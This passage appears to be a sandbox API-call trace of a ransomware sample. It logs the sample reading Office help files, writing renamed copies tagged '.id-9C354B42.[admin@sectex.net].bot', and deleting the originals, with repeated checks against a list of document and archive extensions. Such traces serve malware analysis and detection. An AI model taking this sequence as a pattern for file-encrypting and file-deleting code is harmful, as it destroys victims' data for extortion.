	[0146.257] lstrlenW (lpString=".1cd") returned 4
	[0146.257] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0146.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC") returned 64
	[0146.257] lstrlenW (lpString=".jpg") returned 4
	[0146.257] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0146.257] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0146.257] lstrlenW (lpString="INFOPATH_COL.HXT") returned 16
	[0146.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.258] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=208) returned 1
	[0146.258] CloseHandle (hObject=0x3bc) returned 1
	[0146.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt")) returned 0x20
	[0146.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.258] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.258] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.259] GetLastError () returned 0x0
	[0146.259] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xd0, lpOverlapped=0x0) returned 1
	[0146.260] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0146.261] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.261] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0146.261] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.261] CloseHandle (hObject=0x3d0) returned 1
	[0146.261] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.261] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.766] CloseHandle (hObject=0x3bc) returned 1
	[0146.766] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.005] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt")) returned 1
	[0147.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.019] lstrlenW (lpString=".doc") returned 4
	[0147.019] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0147.019] lstrlenW (lpString=".docx") returned 5
	[0147.019] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0147.019] lstrlenW (lpString=".pdf") returned 4
	[0147.019] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0147.019] lstrlenW (lpString=".xls") returned 4
	[0147.019] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0147.019] lstrlenW (lpString=".xlsx") returned 5
	[0147.020] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0147.020] lstrlenW (lpString=".ppt") returned 4
	[0147.020] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0147.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.020] lstrlenW (lpString=".zip") returned 4
	[0147.020] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0147.020] lstrlenW (lpString=".rar") returned 4
	[0147.020] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0147.020] lstrlenW (lpString=".bz2") returned 4
	[0147.020] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0147.020] lstrlenW (lpString=".7z") returned 3
	[0147.020] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0147.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.020] lstrlenW (lpString=".dbf") returned 4
	[0147.020] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0147.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.020] lstrlenW (lpString=".1cd") returned 4
	[0147.020] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0147.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.020] lstrlenW (lpString=".jpg") returned 4
	[0147.020] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0147.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.020] lstrlenW (lpString=".doc") returned 4
	[0147.020] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0147.020] lstrlenW (lpString=".docx") returned 5
	[0147.020] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0147.020] lstrlenW (lpString=".pdf") returned 4
	[0147.020] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0147.020] lstrlenW (lpString=".xls") returned 4
	[0147.020] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0147.021] lstrlenW (lpString=".xlsx") returned 5
	[0147.021] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0147.021] lstrlenW (lpString=".ppt") returned 4
	[0147.021] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0147.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.021] lstrlenW (lpString=".zip") returned 4
	[0147.021] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0147.021] lstrlenW (lpString=".rar") returned 4
	[0147.021] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0147.021] lstrlenW (lpString=".bz2") returned 4
	[0147.021] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0147.021] lstrlenW (lpString=".7z") returned 3
	[0147.021] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0147.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.021] lstrlenW (lpString=".dbf") returned 4
	[0147.021] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0147.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.021] lstrlenW (lpString=".1cd") returned 4
	[0147.021] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0147.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT") returned 64
	[0147.021] lstrlenW (lpString=".jpg") returned 4
	[0147.021] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0147.022] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.022] lstrlenW (lpString="INFOPATH_F_COL.HXK") returned 18
	[0147.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.022] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0147.022] CloseHandle (hObject=0x2a0) returned 1
	[0147.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk")) returned 0x20
	[0147.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.023] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.023] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.023] GetLastError () returned 0x0
	[0147.023] ReadFile (in: hFile=0x2a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0147.024] WriteFile (in: hFile=0x3b8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0147.025] ReadFile (in: hFile=0x2a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.025] WriteFile (in: hFile=0x3b8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0147.025] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.025] CloseHandle (hObject=0x3b8) returned 1
	[0147.025] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.025] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.027] CloseHandle (hObject=0x2a0) returned 1
	[0147.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk")) returned 1
	[0147.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.028] lstrlenW (lpString=".doc") returned 4
	[0147.028] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.028] lstrlenW (lpString=".docx") returned 5
	[0147.028] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.028] lstrlenW (lpString=".pdf") returned 4
	[0147.029] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.029] lstrlenW (lpString=".xls") returned 4
	[0147.029] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.029] lstrlenW (lpString=".xlsx") returned 5
	[0147.029] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.029] lstrlenW (lpString=".ppt") returned 4
	[0147.029] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.029] lstrlenW (lpString=".zip") returned 4
	[0147.029] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.029] lstrlenW (lpString=".rar") returned 4
	[0147.029] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.029] lstrlenW (lpString=".bz2") returned 4
	[0147.029] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.029] lstrlenW (lpString=".7z") returned 3
	[0147.029] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.029] lstrlenW (lpString=".dbf") returned 4
	[0147.029] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.029] lstrlenW (lpString=".1cd") returned 4
	[0147.029] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.029] lstrlenW (lpString=".jpg") returned 4
	[0147.029] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.029] lstrlenW (lpString=".doc") returned 4
	[0147.029] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.030] lstrlenW (lpString=".docx") returned 5
	[0147.030] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.030] lstrlenW (lpString=".pdf") returned 4
	[0147.030] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.030] lstrlenW (lpString=".xls") returned 4
	[0147.030] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.030] lstrlenW (lpString=".xlsx") returned 5
	[0147.030] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.030] lstrlenW (lpString=".ppt") returned 4
	[0147.030] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.030] lstrlenW (lpString=".zip") returned 4
	[0147.030] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.030] lstrlenW (lpString=".rar") returned 4
	[0147.030] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.030] lstrlenW (lpString=".bz2") returned 4
	[0147.030] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.030] lstrlenW (lpString=".7z") returned 3
	[0147.030] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.030] lstrlenW (lpString=".dbf") returned 4
	[0147.030] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.030] lstrlenW (lpString=".1cd") returned 4
	[0147.030] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK") returned 66
	[0147.030] lstrlenW (lpString=".jpg") returned 4
	[0147.030] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.031] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.031] lstrlenW (lpString="INFOPATH_K_COL.HXK") returned 18
	[0147.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.031] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0147.031] CloseHandle (hObject=0x2a0) returned 1
	[0147.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk")) returned 0x20
	[0147.031] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.032] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.032] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.032] GetLastError () returned 0x0
	[0147.032] ReadFile (in: hFile=0x2a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0147.033] WriteFile (in: hFile=0x3b8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0147.034] ReadFile (in: hFile=0x2a0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.034] WriteFile (in: hFile=0x3b8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0147.034] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.034] CloseHandle (hObject=0x3b8) returned 1
	[0147.034] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.034] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.037] CloseHandle (hObject=0x2a0) returned 1
	[0147.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.037] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk")) returned 1
	[0147.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.038] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.039] lstrlenW (lpString=".doc") returned 4
	[0147.039] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.039] lstrlenW (lpString=".docx") returned 5
	[0147.039] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.039] lstrlenW (lpString=".pdf") returned 4
	[0147.039] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.039] lstrlenW (lpString=".xls") returned 4
	[0147.040] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.040] lstrlenW (lpString=".xlsx") returned 5
	[0147.040] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.040] lstrlenW (lpString=".ppt") returned 4
	[0147.040] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.040] lstrlenW (lpString=".zip") returned 4
	[0147.040] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.040] lstrlenW (lpString=".rar") returned 4
	[0147.040] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.040] lstrlenW (lpString=".bz2") returned 4
	[0147.040] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.040] lstrlenW (lpString=".7z") returned 3
	[0147.040] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.040] lstrlenW (lpString=".dbf") returned 4
	[0147.040] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.040] lstrlenW (lpString=".1cd") returned 4
	[0147.040] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.040] lstrlenW (lpString=".jpg") returned 4
	[0147.040] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.040] lstrlenW (lpString=".doc") returned 4
	[0147.040] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.040] lstrlenW (lpString=".docx") returned 5
	[0147.040] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.040] lstrlenW (lpString=".pdf") returned 4
	[0147.041] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.041] lstrlenW (lpString=".xls") returned 4
	[0147.041] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.041] lstrlenW (lpString=".xlsx") returned 5
	[0147.041] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.041] lstrlenW (lpString=".ppt") returned 4
	[0147.041] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.041] lstrlenW (lpString=".zip") returned 4
	[0147.041] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.041] lstrlenW (lpString=".rar") returned 4
	[0147.041] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.041] lstrlenW (lpString=".bz2") returned 4
	[0147.041] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.041] lstrlenW (lpString=".7z") returned 3
	[0147.041] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.041] lstrlenW (lpString=".dbf") returned 4
	[0147.041] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.041] lstrlenW (lpString=".1cd") returned 4
	[0147.041] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK") returned 66
	[0147.041] lstrlenW (lpString=".jpg") returned 4
	[0147.041] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
